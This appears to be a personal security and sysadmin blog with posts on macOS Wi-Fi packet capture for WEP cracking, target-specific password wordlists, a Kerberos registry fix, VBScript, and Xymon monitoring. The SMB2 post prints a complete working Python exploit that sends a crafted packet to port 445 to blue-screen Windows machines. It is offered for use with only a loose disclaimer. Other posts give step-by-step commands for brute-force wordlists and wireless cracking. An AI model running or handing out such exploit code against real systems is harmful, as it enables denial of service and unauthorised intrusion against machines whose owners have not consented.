Feb/100
Wireless packet capture Airport Extreme
So when using tools like the aircrack-ng suite, it becomes necessary to have a packet capture of the traffic. The problem is that if you are doing this from a newer Macbook like mine, there are sometimes issues with putting the card in monitor mode. This can create a problem when trying to capture the beacon frames that are used in cracking wireless encryption.
One of the things that Apple doesn't tell you is they actually have a packet capture tool built right into OSX. The best thing is it will capture all of the AP traffic so that you can run the aircrack-ng suite against it.
It is pretty buried so the first thing we will do is create a sym link to the actual binary.
sudo ln -sf /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /opt/local/bin
Now that we have a sym link in an area that is inside of the system path, all we have to do now is
sudo airport sniff
This will start creating a .cap file in /tmp. Once you are finished with the capture you have to Ctrl-C to exit, but you now have a shiny .cap file of all the traffic. Downside to using this tool, it doesn't give you any type of status or progress, so it's you best guess as to whether you have enough traffic for something like a IV reuse attack for WEP cracking.
Nov/092
Custom word lists with wyd.pl
For those of you who don't know what a word list is, a word list is...dun dun dun....a giant list of words.
They can be used for many things, but in our case, they are used for brute forcing possible passwords for various things from a users login to a website, or the WPA-PSK encryption a company may be running to protect their wireless network from intruders. You can find a bunch of websites that have word lists on them around the web by searching Google. For higher quality word lists though, you may have to fork out some cash.
This is all fine and dandy, but these word lists are usually based on the english language. What if a company has created a password that is tailored to their company? For example, using the last name of the founder of the company as their WPA-PSK password. If a company has done this, there goes the word list you found based on almost every word in the English dictionary. In comes wyd.pl!
wyd.pl was developed by Max Moser & Martin J. Muench and is included on BackTrack. The general idea behind the tool is to gather data about a specific target and generate a word list based on this data. Enough of the talk, let's see this tool do it's magic. In three simple commands we can have a word list based on all the data we can collect from a target website.
wget -r http://www.mstaint.com
wyd.pl -n -o wordlist.tmp mstaint.com/
cat wordlist.tmp | sort | uniq > wordlist.txt
I started off above by doing a recursive wget of this website, www.mstaint.com. Doing this will create a directory mstaint.com and it will spider though the website doing a wget on each page it can spider.
Next is where wyd does it's magic. Take a look at my output below:
enigma:wyd gerry$ ./wyd.pl -n -o wordlist.tmp mstaint.com/
*
* ./wyd.pl 0.2 by Max Moser and Martin J. Muench
*
* Error initializing some modules:
wlgmod::doc: Cannot find 'catdoc' (http://www.45.free.net/~vitus/software/catdoc/)
wlgmod::odt: Canont find module OpenOffice::OODoc (http://www.cpan.org/modules/index.html)
wlgmod::mp3: Cannot find 'mp3info' (http://www.ibiblio.org/mp3info/)
wlgmod::pdf: Cannot find 'pdftotext' (http://www.foolabs.com/xpdf/)
wlgmod::jpeg: Cannot find 'jhead' (http://www.sentex.net/~mwandel/jhead/)
wlgmod::ppt: Cannot find 'catppt' (http://www.45.free.net/~vitus/software/catdoc/)
Ignoring file 'mstaint.com/me.jpg'
Ignoring file 'mstaint.com/xmlrpc.php?rsd'
Wide character in print at ./wyd.pl line 153.
Wide character in print at ./wyd.pl line 153.
Ignoring file 'mstaint.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3.1'
Ignoring file 'mstaint.com/wp-content/themes/lightword/style.css'
Ignoring file 'mstaint.com/wp-content/themes/lightword/js/cufon.js'
Ignoring file 'mstaint.com/wp-content/themes/lightword/js/mp.font.js'
Ignoring file 'mstaint.com/wp-content/themes/lightword/js/tabs.js'
Ignoring file 'mstaint.com/wp-includes/wlwmanifest.xml'
Ignoring file 'mstaint.com/wp-includes/js/comment-reply.js?ver=20090102'
Ignoring file 'mstaint.com/wp-includes/js/jquery/jquery.js?ver=1.3.2'
** Done
Taking a look at wordlist.tmp, we can see that wyd created a pretty extensive word list of everything it could out of the data we downloaded earlier. One thing you may notice, is nothing is in order and there may be duplicates. Lets fix this with our final command.
enigma:wyd gerry$ cat wordlist.tmp | sort | uniq > wordlist.txt
Our last little command sorts by alphabetical order and then does a uniq on the file removing all of the duplicates.
Take a look and enjoy your new word list in wordlist.txt!
Enjoy!
Nov/090
Microsoft Kerberos Awesomeness!
So anybody that has worked on a large domain has probably run into this issue before.
When joining a machine to a windows domain, there is the possibility that the following error can occur:
Not enough storage is available to complete this operation.
Now now...I know what you may be thinking. "I have a 500Gb hard drive, what the hell is this talking about?" Unfortunately, it is not referring to the space on your machine, or the space on the server for that matter. This error message is referring to the amount of tokens or "group memberships" exceeds the default max bytes of data to be included in a kerberos packet. This size can vary depending on the operating system, but there is a way to fix this problem. Adding the following registry key will force the maximum size of the data to be set very large so we don't have this problem.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters]
"MaxTokenSize"=dword:0000ffff
In decimal, that value is 65,535 if you would like to do it that way. Once you set this value, restart your machine and you should be all set. No more errors.
Sep/090
Microsoft SMB2 Vulnerability update.
Microsoft has released a news update with links to a "Microsoft Fix It" package that will disable SMBv2 until a proper patch is released. Check out http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx to read.
For those of you that do not know what I'm talking about, by using a specially created packet an attacker can exploit a bug in SMBv2 (the protocol that Microsoft File and Print Sharing relies on) and cause a system to blue screen and reboot.
I have tested this myself and it has worked every time..sorry Chaim.
Below is the code that I have been using to to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/python
from socket import *
from time import sleep
hosty = "ip.of.target.machine"
print hosty
host = hosty, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.settimeout(1)
s.connect(host)
s.send(buff)
s.close()
Sep/090
Some updates!
Hey everyone,
Just thought I would update everyone on the different projects I have been working on lately.
School has started again and I now have a week of grad school under the belt, nothing to hard or exciting with that.
I have though been working on redesigning and planning SPARSA's 7th Information Security Talent Search which will be held in March 2010. The old ISTS that has occured for the past 6 years has been scrapped and I have redesigned the entire competition to bring new challenges and excitement to an already awesome competition. This year will be the biggest and baddest ISTS yet. Once I finish rewriting the registration website, I will be opeeing up registration to everyone! Stay tuned for more information as more and more work gets finished up.
Stay tuned for more updates coming soon!
Sep/090
Detect empty arrays in VBScript
So for those of you who have tried to determine the size of an array in VBScript and have failed this may be for you. I recently needed to be able to determine if an array was size 0 in VBscript and was running into some issues.
VBScript does not have a .SizeOf() function that you can execute on an array to determine it's size. Normally what I would do in most other languages is something like the following:
if sizeof(array) = 0
{
//do something here
}
To accomplish this in VBScript you need to do the following.
If IsNull(array) Then
//Do Something Here
End If
Why can't you do things like the rest of the world VBScript!!!!! That is all.
Aug/090
RIT GMail now live!
After over a year of work...we officially launched Google Apps for RIT!
Students can now migrate their accounts over to Google and no longer have to worry about hitting those quota limits!
Head on over to http://google.rit.edu to start today!
Good job to the rest of the team..we worked hard and we finally did it!!
Aug/090
Secure Web Form Development
For anyone that does any type of web development, you should know that XSS has become a major security issue these days.
I had found a great article over at Nettuts that gives a great tutorial on how to secure your web forms with form keys. Each and every time a form is displayed to a user, it creates a key and authenticates that key to make sure that someone is not trying to inject data through your forms.
Drop on over to here to take a look at the tutorial.
Enjoy!
Aug/090
Beginning winSecure & taking requests!
I decided that this week, I'm going to put together a new script called winSecure.
This script will be designed to secure a default Windows XP installation based on common good practices for system administrators to use. I will be putting all my design notes and work progress on my google code site, so drop on over there to see the progress and offer up any suggestions for what you want to see in the script.
Also, I decided that I would love to share my knowledge of Windows scripting with WMI and ADSI to the community so I am now officially taking requests for scripts that you the community would like to see developed to make your job easier. So drop me an email gerry [at] mstaint [dot] com with some specs.
Enjoy!
Jul/092
Windows Update monitoring with Xymon
Xymon is a pretty cool and free system and network monitoring solution. Some of you may know it as Hobbitmon as it recently was forced to change it's name because of some lawsuit I guess.
For those of you who haven't heard of it before check it out over at http://hobbitmon.sourceforge.net/. We use it currently at RIT to monitor a few hundred systems ranging from Windows to VMWare and Solaris. It basically does it all.
Using the BBWin client over at http://bbwin.sourceforge.net/ we are able to monitor anything and everything that you can script in Windows. Whether it be monitoring drive and memory usage right on down to parsing log files for specific events...if you can script it, it can be monitored.
What I ended up doing was writing a VBScript that would be executed by BBWin and would then use the Windows Update API built into windows to check and then create a report about critical patches not being installed or active (the patch installed but system not rebooted).
You can download the script on my Google Code at http://code.google.com/p/mstaint/. Installation instructions are included in the zip file download.
Drop me an email if you have a feature request for something you would like to see added to it.
Enjoy.